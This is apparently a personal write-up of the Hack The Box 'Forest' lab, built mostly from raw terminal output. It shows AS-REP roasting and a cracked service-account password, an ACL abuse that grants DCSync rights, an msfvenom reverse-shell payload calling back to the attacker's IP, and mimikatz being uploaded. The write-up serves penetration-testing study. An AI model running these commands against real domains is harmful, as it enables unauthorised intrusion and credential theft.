Forest

This is a windows machine from hack the box.

Nmap scan
└─$ nmap -sV -sC -oA active 10.10.10.161
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-06 06:08 EDT
Nmap scan report for 10.10.10.161
Host is up (0.34s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-06 10:15:54Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  0ċ�V       Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-09-06T10:16:17
|_  start_date: 2023-09-06T10:13:19
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 2h26m52s, deviation: 4h02m31s, median: 6m50s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-09-06T03:16:16-07:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.20 seconds

Trying 445 as potential low hanging fruit

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb  10.10.10.161  -u "" up ""
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)

Domain is htb.local

Enumerating shares – Getting nothing much


┌──(kali㉿kali)-[~/HTB/Forest]
└─$ crackmapexec smb 10.10.10.161 --shares   
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 358, in connectTree
    return self._SMBConnection.connect_tree(share)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/smb.py", line 2835, in tree_connect_andx

Searching ldapsearch to try annd get usernames. Using the command “ldapsearch -x -H ldap://10.10.10.161 -b ‘DC=EGOTISTICAL-BANK,DC=LOCAL’ -s sub ‘(objectClass=person)’ sAMAccountName


┌──(kali㉿kali)-[~/HTB/Forest]
└─$ ldapsearch -x -H ldap://10.10.10.161 -s base namingcontexts   

# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Then suing the command to get the users and we grep only the users– ldapsearch -x -H ldap://10.10.10.161 -b ‘DC=htb,DC=LOCAL’ -s sub ‘(objectClass=person)’ sAMAccountName

uest
DefaultAccount
FOREST$
EXCH01$
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
andy
mark
santi
                                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ 


Using kerbroot to find which users are valid after output to users.txt

┌──(kali㉿kali)-[~/HTB/Forest]
└─$ ./kerbrute userenum --dc 10.10.10.161 -d  HTB.LOCAL users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/06/23 - Ronnie Flathers @ropnop

2023/09/06 06:28:11 >  Using KDC(s):
2023/09/06 06:28:11 >   10.10.10.161:88

2023/09/06 06:28:11 >  [+] VALID USERNAME:       [email protected]
2023/09/06 06:28:11 >  [+] VALID USERNAME:       [email protected]
2023/09/06 06:28:11 >  [+] VALID USERNAME:       [email protected]
2023/09/06 06:28:11 >  [+] VALID USERNAME:       [email protected]
2023/09/06 06:28:11 >  [+] VALID USERNAME:       [email protected]
2023/09/06 06:28:11 >  [+] VALID USERNAME:       [email protected]
2023/09/06 06:28:11 >  Done! Tested 6 usernames (6 valid) in 0.346 seconds
                                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/HTB/Forest]

adding HTB.local to the hosts file

└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.190.10.161   htb.local

using GetNPusers.py from impacket with command example

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/administrator
Impacket v0.11.0 - Copyright 2023 Fortra

Password:

^CTraceback (most recent call last):
  File "/usr/share/doc/python3-impacket/examples/./GetNPUsers.py", line 470, in <module>
    executer.run()
  File "/usr/share/doc/python3-impacket/examples/./GetNPUsers.py", line 257, in run
    ldapConnection = ldap.LDAPConnection('ldap://%s' % self.__target, self.baseDN, self.__kdcIP)
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/ldap/ldap.py", line 115, in __init__
    self._socket.connect(sa)
KeyboardInterrupt


Not able to get any hashes for the users


┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/Lucinda 
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate Lucinda, getting its TGT
[-] User Lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                                                                                 
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/santi  
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate santi, getting its TGT
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                                                                                 
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/mark 
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate mark, getting its TGT
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                                                                                 
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/andy         
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate andy, getting its TGT
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
                                                                                                                                                                                 
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py HTB.LOCAL/sebastien
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate sebastien, getting its TGT
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set

Using the Command –? GetNPUsers.py -dc-ip 10.10.10.161 -request ‘htb.local/’

From chatGPT –> Effectively, the command is attempting to retrieve NTLM hashes for user accounts in the ‘htb.local’ domain from the domain controller at IP 10.10.10.161 that have the “Do not require Kerberos pre-authentication” setting enabled.


┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.161 -request 'htb.local/'
Impacket v0.11.0 - Copyright 2023 Fortra

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC      
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2023-09-06 07:04:05.238787  2019-09-23 07:09:47.931194  0x410200 



[email protected]:1fc8155b51cbc86433259e43c839f3b6$debc0747dcb68f4f0b7780f062d7b876a40957451858e76dded149772ee51dbebf968c991765873fc8bcb04d92ea7f5ea9f43c1ab5ca60f11befbf0d2fa4b5e6e6428cc58911fed2c99f9d690cb5cd36c9b3e83b75843f201d97ee0064749b4631e07807cc9ef420a255ada51413c0a95749aab4ee0f080045291085edd2d1849dc72baf68cb7048855b0820de16db49b7544699463273c81c8480cbf79b8c13006b897a20599b5a897975e2bcc0d4fabae512bbba6061e95735b2dd64320bbb798f515a2f240b072fe70020622b79a6d86deabc0c0186dbe79445d121802d14e36b23029594
                                                                                                                                                                                 
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]

Check the hash mode

./hashcat --example-hashes | less 

Hash mode #18200
  Name................: Kerberos 5, etype 23, AS-REP
  Category............: Network Protocol
  Slow.Hash...........: No
  Password.Len.Min....: 0
  Password.Len.Max....: 256
  Salt.Type...........: Embedded
  Salt.Len.Min........: 0
  Salt.Len.Max........: 256
  Kernel.Type(s)......: pure, optimized
  Example.Hash.Format.: plain
  Example.Hash........: [email protected]:3e156ada591263b8a...102ac [Truncated, use --mach for full length]
  Example.Pass........: hashcat
  Benchmark.Mask......: ?b?b?b?b?b?b?b
  Autodetect.Enabled..: Yes
  Self.Test.Enabled...: Yes
  Potfile.Enabled.....: Yes
  Custom.Plugin.......: No
  Plaintext.Encoding..: ASCII, HEX



Try and crack with hashcat and get the password s3rvice


[email protected]:7d0b8ffb982981828a17da5d8eee9ec3$25f69765117a64010ad204b7d80d9a6ccbbc3144012f87316b517b126518efe6e0fbb1c3ea1a19ad630c4e61e2a80a6257048f2c8446b4e81fccf6da76d049c1b221924b2904800ed0c695180312ae92870831140785547ab76fca82564e101c0c67e7893d1890ae65cd394cf048e711ddd5546fefee809c15241044dc9ce08c49ccbaf7db218b7927f0bca416c202b356dcd554bb03c1cbfeba4848c3dec11575c4a328c8610d893b95334e23a1ac527d53ff806b96e424dab29e557a7fe5077eb3c32bdd50135b0256f988c5c992bf8c45114d0b9660a528f6400059ae5dafcf072dfc98f4:s3rvice
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: [email protected]:7d0b8ffb982981...fc98f4
Time.Started.....: Wed Sep  6 07:08:52 2023 (7 secs)
Time.Estimated...: Wed Sep  6 07:08:59 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   584.0 kH/s (1.52ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4085760/14344385 (28.48%)
Rejected.........: 0/4085760 (0.00%)
Restore.Point....: 4083712/14344385 (28.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: s523480 -> s3r3ndipit
Hardware.Mon.#1..: Util: 71%

Started: Wed Sep  6 07:08:49 2023
Stopped: Wed Sep  6 07:09:01 2023

Using crackmap exec to check if we can pawn


┌──(kali㉿kali)-[/usr/bin]
└─$ crackmapexec winrm 10.10.10.161 -u svc-alfresco -p s3rvice
SMB         10.10.10.161    5985   FOREST           [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP        10.10.10.161    5985   FOREST           [*] http://10.10.10.161:5985/wsman
WINRM       10.10.10.161    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)

using evil-rm and we get the user flag – 9b467960b7b0ddd353dd7a2ad776a254

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> ls


    Directory: C:\Users\svc-alfresco


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/23/2019   2:16 PM                Desktop
d-r---        9/22/2019   4:02 PM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos


*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         9/6/2023   3:13 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cat user.txt
9b467960b7b0ddd353dd7a2ad776a254
*Evil-WinRM* PS C:\Users\svc-alfre

upload and then run Sharphound after putting it in the right folder then download the zip file


nfo: Uploading /home/kali/HTB/Forest/SharpHound.exe to C:\Users\svc-alfresco\Desktop\SharpHound.exe
                                                  
Data: 1395368 bytes of 1395368 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/6/2023   4:26 AM        1046528 SharpHound.exe
-ar---         9/6/2023   3:13 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> SharpHound.exe
The term 'SharpHound.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ SharpHound.exe
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (SharpHound.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ./SharpHound.exe
2023-09-06T04:28:17.2104460-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2023-09-06T04:28:17.6479741-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-09-06T04:28:17.7416956-07:00|INFORMATION|Initializing SharpHound at 4:28 AM on 9/6/2023
2023-09-06T04:28:18.5698497-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2023-09-06T04:28:18.7885786-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-09-06T04:28:19.8667072-07:00|INFORMATION|Beginning LDAP search for htb.local
2023-09-06T04:28:20.0073312-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-09-06T04:28:20.0073312-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-09-06T04:28:49.8983385-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2023-09-06T04:29:03.4449219-07:00|INFORMATION|Consumers finished, closing output channel
2023-09-06T04:29:03.4917929-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2023-09-06T04:29:03.7574559-07:00|INFORMATION|Status: 161 objects finished (+161 3.744186)/s -- Using 48 MB RAM
2023-09-06T04:29:03.7574559-07:00|INFORMATION|Enumeration finished in 00:00:43.9036240
2023-09-06T04:29:03.8369185-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
 117 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-09-06T04:29:03.8519606-07:00|INFORMATION|SharpHound Enumeration Completed at 4:29 AM on 9/6/2023! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/6/2023   4:29 AM          18650 20230906042902_BloodHound.zip
-a----         9/6/2023   4:29 AM          19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----         9/6/2023   4:26 AM        1046528 SharpHound.exe
-ar---         9/6/2023   3:13 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> download 20230906042902_BloodHound.zip
                                        
Info: Downloading C:\Users\svc-alfresco\Desktop\20230906042902_BloodHound.zip to 20230906042902_BloodHound.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> 

Using bloodhound

Start Neo4j


                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ sudo neo4j console   
[sudo] password for kali: 
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
2023-09-06 11:25:48.852+0000 INFO  Starting...
2023-09-06 11:25:51.070+0000 INFO  This instance is ServerId{012fd76f} (012fd76f-f868-4f49-8648-df3c0a92529c)

Go to http://localhost:7474/ and change the password

start bloodhound using bloodhound command and login

Go to analysys–>shortest path to domain admin

![[Pasted image 20230906194633.png]]

Found a very cool utility on github that helps with bloodhound autyomatically –> github .com/fox-it/


pip install aclpwn
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ sudo pip install aclpwn
[sudo] password for kali: 
Collecting aclpwn
  Downloading aclpwn-1.0.0-py3-none-any.whl (17 kB)
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from aclpwn) (0.11.0)
Requirement already satisfied: ldap3>=2.5 in /usr/lib/python3/dist-packages (from aclpwn) (2.9.1)
Collecting neo4j-driver (from aclpwn)
  Downloading neo4j-driver-5.12.0.tar.gz (191 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 191.1/191.1 kB 1.5 MB/s eta 0:00:00
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Installing backend dependencies ... done
  Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from aclpwn) (2.31.0)
Requirement already satisfied: dsinternals in /usr/lib/python3/dist-packages (from impacket->aclpwn) (1.2.4)
Requirement already satisfied: pytz in /usr/lib/python3/dist-packages (from neo4j-driver->aclpwn) (2023.3)
Building wheels for collected packages: neo4j-driver
  Building wheel for neo4j-driver (pyproject.toml) ... done
  Created wheel for neo4j-driver: filename=neo4j_driver-5.12.0-py3-none-any.whl size=263951 sha256=d520dd450afa34d41f327d68a05f95d96a4e6a57307dd65b309d5bdc48a501ee
  Stored in directory: /root/.cache/pip/wheels/a4/f7/ba/ecf94a7eb4eb6631820c99bb894dcc90477101cb90e6d46237
Successfully built neo4j-driver
Installing collected packages: neo4j-driver, aclpwn
Successfully installed aclpwn-1.0.0 neo4j-driver-5.12.0
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv

Running aclpwn on our machine after starting bloodhound — ”aclpwn -f [email protected] -t htb.local -tt domain –database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice

aclpwn -f svc-alfresco.local -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -a 10.10.10.161 -sp s3rvice Traceback (most recent call last): File "/usr/local/bin/aclpwn", line 5, in <module> from aclpwn import main File "/usr/local/lib/python3.11/dist-packages/aclpwn/__init__.py", line 7, in <module> from aclpwn import utils, pathfinding, database, exploitation File "/usr/local/lib/python3.11/dist-packages/aclpwn/pathfinding.py", line 1, in <module> from aclpwn import utils, database File "/usr/local/lib/python3.11/dist-packages/aclpwn/database.py", line 2, in <module> from neo4j.v1 import GraphDatabase ModuleNotFoundError: No module named 'neo4j.v1'

This error is because we have neo4j v5 running and its expecting version 1

Will run this under an environment

sudo apt install python3.11-venv

python3 -m venv myenv

pip install aclpwn neo4j==1.*


We then run the same command under this environment still get the same error

Found fix via chatGPT

  • Locate the database.py file for aclpwn. Based on your error, it’s located at /usr/local/lib/python3.11/dist-packages/aclpwn/database.py
  • changed from neo4j.v1 import GraphDatabase to from neo4j import GraphDatabase

After spending many hours with different versions of bloodhound and ne04j, i finally got the aclpwn to work

To install aclpwn

pip install aclpwn

Running bloodhound 3.05

┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ls                            
BloodHound              chrome_200_percent.pak  icudtl.dat  libffmpeg.so  libvk_swiftshader.so  LICENSE                 locales    resources.pak      swiftshader              version
chrome_100_percent.pak  chrome-sandbox          libEGL.so   libGLESv2.so  libvulkan.so          LICENSES.chromium.html  resources  snapshot_blob.bin  v8_context_snapshot.bin  vk_swiftshader_icd.json
                                                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ./BloodHound  
(node:12127) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.



starting neo4j

┌──(kali㉿kali)-[~]
└─$ sudo neo4j console                                             
[sudo] password for kali: 
Active database: graph.db
Directories in use:
  home:         /var/lib/neo4j
  config:       /etc/neo4j
  logs:         /var/log/neo4j
  plugins:      /var/lib/neo4j/plugins
  import:       /var/lib/neo4j/import
  data:         /var/lib/neo4j/data
  certificates: /var/lib/neo4j/certificates
  run:          /var/run/neo4j
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
2023-09-09 12:33:43.663+0000 INFO  ======== Neo4j 3.5.35 ========
2023-09-09 12:33:43.713+0000 INFO  Starting...
2023-09-09 12:33:49.736+0000 INFO  Bolt enabled on 127.0.0.1:7687.
2023-09-09 12:33:53.386+0000 INFO  Started.
2023-09-09 12:33:55.678+0000 INFO  Remote interface available at http://localhost:7474/
2023-09-09 12:35:20.565+0000 WARN  The client is unauthorized due to authentication failure.

The Sharphound file we used is inside the source file for bloodhound 3.05

┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ ls
 BloodHound-3.0.5   BloodHound-3.0.5.zip   BloodHound-linux-x64  'BloodHound-linux-x64(1).zip'
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ cd BloodHound-3.0.5
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ ls
appveyor.yml            deploy.sh  index.html  LICENSE-3RD-PARTY.md  main.js       package-lock.json  renderer.js  src                            webpack.config.production.js
BloodHoundExampleDB.db  docs       Ingestors   LICENSE.md            package.json  README.md          server.js    webpack.config.development.js
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ cd Ingestors       
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ ls
DebugBuilds  SharpHound.exe  SharpHound.ps1
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]

Running aclpwn — ~/.local/bin/aclpwn -f [email protected] -t htb.local -tt domain –database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice

└─$ ~/.local/bin/aclpwn -f [email protected] -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice
[!] Unsupported operation: GetChanges on HTB.LOCAL (Base,Domain)
[-] Invalid path, skipping
[!] Unsupported operation: GenericAll on EXCH01.HTB.LOCAL (Computer,Base)
[-] Invalid path, skipping
[+] Path found!
Path [0]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE TRUSTED [email protected])-[MemberOf]->(EXCHANE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
[+] Path found!
Path [1]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTBLOCAL)
Please choose a path [0-1] 0
[-] Memberof -> continue
[-] Memberof -> continue
[-] Memberof -> continue
[-] Adding user SVC-ALFRESCO to group EXCHANGE TRUSTED [email protected]
[+] Added CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local as member to CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
[-] Re-binding to LDAP to refresh group memberships of [email protected]
[+] Re-bind successful
[-] Memberof -> continue
[-] Modifying domain DACL to give DCSync rights to SVC-ALFRESCO
[+] Dacl modification successful
[+] Finished running tasks
[+] Saved restore state to aclpwn-20230909-084819.restore

Now i need to run mimikats so i will uplooad a reverse shell and capture it on my computer so i can run mimikatz as mimikatz has issues running on evil-winrm from previous experience

Creating reverse shell –msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe -o shell.exe

Evil-WinRM PS C:\Users\svc-alfresco\Documents> ./shell.exe

└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ ls
20230909054106_BloodHound.zip  aclpwn-20230909-084819.restore  aclpwn.py  active.gnmap  active.nmap  active.xml  forest  kerbrute  SharpHound.exe  shell.exe  users.txt
                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice                                               
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload /home/kali/HTB/Forest/shell.exe
                                        
Info: Uploading /home/kali/HTB/Forest/shell.exe to C:\Users\svc-alfresco\Documents\shell.exe
                                        
Data: 9556 bytes of 9556 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls


    Directory: C:\Users\svc-alfresco\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/9/2023   5:41 AM          15180 20230909054106_BloodHound.zip
-a----         9/9/2023   5:41 AM          23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----         9/9/2023   5:40 AM         833536 SharpHound.exe
-a----         9/9/2023   6:06 AM           7168 shell.exe


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload /home/kali/HTB/Forest/mimikatz.exe
                                        
Info: Uploading /home/kali/HTB/Forest/mimikatz.exe to C:\Users\svc-alfresco\Documents\mimikatz.exe
                                        
Data: 1236512 bytes of 1236512 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls


    Directory: C:\Users\svc-alfresco\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/9/2023   5:41 AM          15180 20230909054106_BloodHound.zip
-a----         9/9/2023   6:10 AM         927384 mimikatz.exe
-a----         9/9/2023   5:41 AM          23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----         9/9/2023   5:40 AM         833536 SharpHound.exe
-a----         9/9/2023   6:06 AM           7168 shell.exe

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ./shell.exe

We capture the shell on our machine


┌──(kali㉿kali)-[~/Downloads/x64]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.161] 51307
